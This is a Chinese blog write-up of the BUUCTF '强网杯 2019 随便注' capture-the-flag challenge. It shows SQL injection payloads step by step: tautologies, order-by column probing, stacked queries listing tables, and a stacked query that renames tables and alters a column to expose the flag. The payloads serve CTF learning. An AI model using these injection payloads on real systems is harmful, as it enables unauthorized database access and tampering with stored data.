【BUUCTF】[强网杯 2019]随便注 1

最新推荐文章于 2024-07-18 18:25:57 发布
最新推荐文章于 2024-07-18 18:25:57 发布
阅读量4k 收藏 17
点赞数 8
分类专栏: BUUCTF之Web 文章标签: sql web安全 BUUCTF ctf sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45972928/article/details/124608123
版权

这是一个典型的sql注入题目

知识点:
1、注入点检测
2、万能匹配
3、暴力获得数据表和其属性
4、sql语句的掌握(order by; union select; rename table; alter table…等等)

1、进入网站
在这里插入图片描述
2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况
经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示
3、测试是否存在注入
and 1=1和and 1=2没有变化
在这里插入图片描述
在这里插入图片描述
在参数后面加单引号,发现错误,可以尝试进行注入
在这里插入图片描述
4、尝试0‘ or ‘1’='1;0" or “1”="1等,发现可行
在这里插入图片描述
5、尝试order by+数字,直至返回错误,获得表中的列树;#号用来注释掉后面的命令

1’ order by 2#
2’ order by 3#

在这里插入图片描述

发现3的时候报错,所以表中只有两列数据
6、联合查询,发现select等操作被过滤

1’ union select 1,2

在这里插入图片描述

7、获取表名,发现有两个表

0’; show tables;#

在这里插入图片描述
8、获取表中的列名,发现被查询的是words表,而flag在另一个表中,我们需要获取其中的饿内容

0'; show columns from words;#
0'; show columns from `1919810931114514`;#

在这里插入图片描述
在这里插入图片描述
9、更改表名列名(偷天换日)

因为查询是在words中查询id的,所以我们将表1919810931114514改名为words,将words改名为其余的名字。同时将flag属性改名为id属性,类型为varchar(100)

0';rename table `words` to words2;rename table `1919810931114514` to words;alter table words change flag id varchar(100);show tables;#

在这里插入图片描述

10、查看改之后的words表中的所有内容获得flag

1’ or ‘1’='1

在这里插入图片描述

酥酥~
关注
专栏目录
BUUCTF 随便WP
小白渣的博客
12-19 1209
首先我们先看到题目,我们由题意可知是sql注入 于是用 ’ 试试 然后我们尝试一些入的常用的词汇 发现都被过滤了,但是尝试一下 堆叠入就可发现 ';show tables;# 看了前面大佬的博客可以 绕过关键词过滤 关于MySQL中的预处理语句原理与使用,这篇文章讲解的比较详细:MySQLSQL预处理(Prepared)本题中由于可以使用堆叠查询,并且需要使用SELECT关键字并绕...
BUUCTF[强网杯2019]随便
楼阁de猫的博客
09-23 539
[强网杯2019]随便 知识点:堆叠入 首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠入 我们输入1’; 发现下面出现了一条横线 那应该是堆叠入了,(什么是堆叠入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql注入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql注入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
[强网杯 2019]随便1
最新发布
m0_73759843的博客
07-18 200
前面已经提示不能使用,where等字段;尝试显错入发现不行。
[强网杯 2019]随便 1
tomatoff的博客
03-14 2849
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 992
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
BUUCTF [强网杯 2019]随便 1(两种方法)
热门推荐
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
BUUCTFweb强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 615
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL注入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1385
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
BUUCTF: [强网杯 2019]随便 1
emdog的博客
10-21 309
新手可以看下sql注入基础原理(超详细)这篇博客,有一个基本的概念。 点开题目链接看到 首先判断下是什么类型的入,输入1',发现报错,说明是字符型入,单引号闭合 输入1, 输入1' or 1=1#,显示 再测试字段数' order by 1 #,到3时报错,说明字段数为2,即2列。 尝试用union select联合查询继续获取信息,输入1' union select 1,2,database()# database()将会返回当前网站所使用的数据库名字. user()将会返回执行当前查询的用
BUUCTF [强网杯 2019]随便1(另一种方法)
weixin_53955759的博客
06-21 381
打开环境,先判断一下是单引号还是双引号闭合
BUUCTF-[强网杯 2019]随便1
Monica的博客
09-06 657
目录 题目: 方法: 其他问题: 1、url中#是特殊字符,参数中有#号的时候需要进行url编码。 2、url中空格变成+和空格变成%20问题 题目: 方法: 只有输入1和2才有结果 发现输出是两列,一列是键,一列是值 测试是什么闭合 输入1'发现有个报错 我们复制near后面的代码,通过一个字符一个字符的删除,发现是: 单引号 单引号 1 单引号 单引号 单引号 所以这不是双引号闭合,而是一个单引号闭合。 测试输出有几列 pa...
BUUCTF】[强网杯 2019]随便1
aoao331198的博客
03-07 394
题目很明显是一道SQL注入题目 1' 1' #
BUUCTF强网杯 2019随便1 write up
GZWZ_的博客
04-06 4865
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
buuctf[强网杯 2019]随便 1(超详细,三种解法)
2401_84968940的博客
05-12 321
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值